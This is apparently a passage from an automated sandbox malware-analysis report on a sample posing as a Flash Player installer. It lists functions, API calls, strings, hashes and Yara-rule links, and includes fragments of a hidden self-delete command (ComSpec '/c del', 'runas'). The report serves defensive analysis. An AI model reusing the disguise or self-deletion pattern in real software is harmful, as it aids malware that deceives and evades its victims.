                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD019234A11108EBCB15EF98C194AADBBF5FB45315F6086E9DC159B391C730AE42DBA0
                                                                                                                                                                                                                    Function 00B3C685 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: fe9091a269dde85ea37ff48247502998e8bf628bc9e4cf245add92d9984e6776
                                                                                                                                                                                                                    • Instruction ID: 73fede840ff21142a62192b9982d30a5c8ca6107d1b829141dd81332c983a1d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe9091a269dde85ea37ff48247502998e8bf628bc9e4cf245add92d9984e6776
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0D0A7789001047B81589729DC0BD737A7DD343214F412234EC45E3390C900EC1143FF
                                                                                                                                                                                                                    Function 00B2C5C8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 76c82190522b7c7453c1da42fb0813f6199d4d60ef68341f0432e3342fc413fa
                                                                                                                                                                                                                    • Instruction ID: 43bb3d20e1b392e409b6c253e277c8ed415cac0607997f185d5a77d36cb7cd87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76c82190522b7c7453c1da42fb0813f6199d4d60ef68341f0432e3342fc413fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCD012BAF8260087DA499F34DC43AA9616752D722270CF1345417D739BD83CD455402E
                                                                                                                                                                                                                    Function 00B1E408 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3472be5c6ac56d2b04134d5d7df96adbf9b90126a51f7feffe32bb227cbf3e08
                                                                                                                                                                                                                    • Instruction ID: 1fce5fdaaed316b99bc8c9f69f208e0d0372c3c5073808f258a01a060ef95f83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3472be5c6ac56d2b04134d5d7df96adbf9b90126a51f7feffe32bb227cbf3e08
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13B092A2C40100CAD0512F502C424BAB4794593A91F04E0B4F80A223A2A616E21A505B
                                                                                                                                                                                                                    Function 00B2AA40 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 51e5cc0691258e225b49338ebd35a17b83519d4d253bb02e098b66d673d50b29
                                                                                                                                                                                                                    • Instruction ID: 09f0fc126c9f497e77680c56fc77242282f4e601c4da94002c963cbedc3cfd34
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e5cc0691258e225b49338ebd35a17b83519d4d253bb02e098b66d673d50b29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41B092B1C142418BC6409F509842826B6B16687250F146834E008A32A1DA22D819860E
                                                                                                                                                                                                                    Function 00B171A3 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f4cfd0e22bdd2c3dcf4781f09dc9b2c3b3b182c6d4491cca677f86ccd1ad79f8
                                                                                                                                                                                                                    • Instruction ID: 7c727fdc30bbd10aad62ac5e0f75ebb1f2f57e37e059c0bb7094052ef7a9a508
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cfd0e22bdd2c3dcf4781f09dc9b2c3b3b182c6d4491cca677f86ccd1ad79f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB01290C04100C6C040DF009C01571F17C010B541F00B020E40DA3253D110E100411D
                                                                                                                                                                                                                    Function 00B1EB53 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7d7b0932c5cb6e64dd9628b3f9b4fec10a2f96da8f175b69ac8e2ac2258ca3ee
                                                                                                                                                                                                                    • Instruction ID: 707a55c5cb6d3590ac796a1d8221a9a5f08f5b68c65dc43c2df98c77c39286a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d7b0932c5cb6e64dd9628b3f9b4fec10a2f96da8f175b69ac8e2ac2258ca3ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB012D0C0424082C000DF109C41471E1BC410B141F107420E00EA3253D110E100811D
                                                                                                                                                                                                                    Function 00B16AFB Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 143a470172efcfefaa0e3cb3f7de688c7be185c0810369f0038da372c170ac48
                                                                                                                                                                                                                    • Instruction ID: 9cfe8b7b2cca3ed6965cf08700479d47634cb2f8ac0b04f26527788029bfee64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143a470172efcfefaa0e3cb3f7de688c7be185c0810369f0038da372c170ac48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAA00228D481009681108F09A480470E6B8B30F516F503610905CF3115C210D544450C
                                                                                                                                                                                                                    Function 003AAE2A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003AAEA3
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 003AAF20
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003AAF2C
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 003AAF5F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                                    • Opcode ID: a6811a3833de14005710a5aa7ddce018d5b9c92b20c8c030693bb1e5ebe405f9
                                                                                                                                                                                                                    • Instruction ID: 84325949b77a67fe85ce8c2001250305afcc8d0c93100262cb1c020fab16fed7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6811a3833de14005710a5aa7ddce018d5b9c92b20c8c030693bb1e5ebe405f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC815DB5A00605DFDB16CFA8C885BAEB7F9FF49300F158129E915D7250EBB0E940CB61
                                                                                                                                                                                                                    Function 003A41F2 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 289COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 003A41FE
                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 003A4206
                                                                                                                                                                                                                      • Part of subcall function 003A450F: GetProcessHeap.KERNEL32(00000000,?,003A101A,?,?,003A11AF,003A4215,00000000,?,00000000,?,003A1421,?,00000000,?,003A4215), ref: 003A4515
                                                                                                                                                                                                                      • Part of subcall function 003A450F: HeapAlloc.KERNEL32(00000000,?,003A4215,00000000), ref: 003A451C
                                                                                                                                                                                                                      • Part of subcall function 003A4523: GetProcessHeap.KERNEL32(00000000,?,003A56F5,00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4529
                                                                                                                                                                                                                      • Part of subcall function 003A4523: HeapFree.KERNEL32(00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4530
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 003A44FC
                                                                                                                                                                                                                      • Part of subcall function 003A2023: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,00000000,00000000), ref: 003A204E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCommandEnvironmentExitFreeHandleLineModuleVariable
                                                                                                                                                                                                                    • String ID: Flash$FlashInstall.log$Macromed$PostfixCommandLine$PrefixCommandLine
                                                                                                                                                                                                                    • API String ID: 2400563013-3347144162
                                                                                                                                                                                                                    • Opcode ID: b2e80fed286650e264f247123b19da62f04feee3ce172de86f65bc56e8043e1a
                                                                                                                                                                                                                    • Instruction ID: e935e6fee5eeb99cabb12a56f76c84a4bb27269a38e3b33c145a3d5ac91e45c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2e80fed286650e264f247123b19da62f04feee3ce172de86f65bc56e8043e1a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49917271A102047BDF0BF7B5DC57EBE7AADEF8B350F00051DF102AB192EE64A9458661
                                                                                                                                                                                                                    Function 003A6CED Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,00000000), ref: 003A6D34
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 003A6D4D
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 003A6D59
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003A6D6F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$CurrentHandleModuleProcess
                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$IsWow64Process$kernel32
                                                                                                                                                                                                                    • API String ID: 977827838-3456838754
                                                                                                                                                                                                                    • Opcode ID: d6c24ef26db1241010c2f2eac045a7ea013fdfdd21109030deb7a5c44a0b481f
                                                                                                                                                                                                                    • Instruction ID: b2ad763af617ce0af9e973adb774cf245d9109410404018cde01a0ccd8a737de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6c24ef26db1241010c2f2eac045a7ea013fdfdd21109030deb7a5c44a0b481f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7821B071A102189FDB22EBB89C86AEEB7ACEB4B744F150019E515D7181DB74D805CB60
                                                                                                                                                                                                                    Function 003A4725 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228timethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 003A4739
                                                                                                                                                                                                                      • Part of subcall function 003A46F7: SetWaitableTimer.KERNEL32(?,?,00000000,003A46EB,?,00000000,?,?,?,003A4749), ref: 003A471D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003A4941
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003A49A1
                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 003A49B0
                                                                                                                                                                                                                      • Part of subcall function 003A45E5: ReleaseMutex.KERNEL32(00000008,003A46AC,000000FF,00000000,00000000,003A40EB,003A664F,00000005,?,?,0000005C,00000090,?,?,?,003AC824), ref: 003A45E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandleTimerWaitable$CreateExitMutexReleaseThread
                                                                                                                                                                                                                    • String ID: Flash Player Seed/3.0$GET$HTTP/1.0
                                                                                                                                                                                                                    • API String ID: 268163532-3134777829
                                                                                                                                                                                                                    • Opcode ID: 029ae2429fc9dd902592dcee5e6d3885f43ee62063fc6640600a56909c5c7bc4
                                                                                                                                                                                                                    • Instruction ID: 6bb6e48fd43d3c9c6dc6c682f6b3f09e44401074883454f75edf52ce1de1fd64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 029ae2429fc9dd902592dcee5e6d3885f43ee62063fc6640600a56909c5c7bc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 448126B1900209AFEB22DFA0CC85DAFBBB9FF46304F00852DF156A6591D7B4AE55CB50
                                                                                                                                                                                                                    Function 003A2023 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,00000000,00000000), ref: 003A204E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                    • String ID: " >> NUL$/c del "$ComSpec$open$runas
                                                                                                                                                                                                                    • API String ID: 1431749950-418080887
                                                                                                                                                                                                                    • Opcode ID: d893bbd0ebf872077adbffd6d0d0613b962aaea8b1d196eb0ebbeb2ac78ed6f7
                                                                                                                                                                                                                    • Instruction ID: e8286d2ea8f27060c491fda0f4558a21f5b348d4481bfff24f04c150dc4a5ea0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d893bbd0ebf872077adbffd6d0d0613b962aaea8b1d196eb0ebbeb2ac78ed6f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B218E716201086FDB26EBA9DC52DEE7B6CEB1B300F000129F50ADA041EE605908CAA1
                                                                                                                                                                                                                    Function 003A565F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,000001CC,CodeSignLogFile,CodeSignRootCert,000001CC,000001D0,000001D0,?,0000005C), ref: 003A5686
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,mms.cfg,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A56A7
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 003A56DA
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A5709
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: mms.cfg
                                                                                                                                                                                                                    • API String ID: 3919263394-2534990190
                                                                                                                                                                                                                    • Opcode ID: 111ceeddefc6f3ef191e01e29ec8fa5b867c8b0fc20962bdef4f8272863d7b38
                                                                                                                                                                                                                    • Instruction ID: 32353bf9d99cacf70ffad3f1f8f22ec852bdc0a48eb77ea275cb55fa4966cd72
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 111ceeddefc6f3ef191e01e29ec8fa5b867c8b0fc20962bdef4f8272863d7b38
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621C031940614ABCB23AFA8DC88BDEBBACEF47B50F111154F855AB1A0DBB18944C660
                                                                                                                                                                                                                    Function 003A277B Relevance: 7.6, APIs: 5, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A279B
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A27C3
                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash), ref: 003A27D4
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A2809
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A2813
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Local$AllocCloseCurrentErrorFreeHandleLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1388692885-0
                                                                                                                                                                                                                    • Opcode ID: d302cac3edaf8dad36a462cf87b6be251e12c5c0b2867f0d919249fa32f6cb9b
                                                                                                                                                                                                                    • Instruction ID: e26a3a0164f926a0c26ed6576473afae5209a261e3fec134c02b948bcaadf40f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d302cac3edaf8dad36a462cf87b6be251e12c5c0b2867f0d919249fa32f6cb9b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96111C75940209EFDF22ABA4DC09BEFBB7DEF06741F154460F901A61A1DB349A05EB60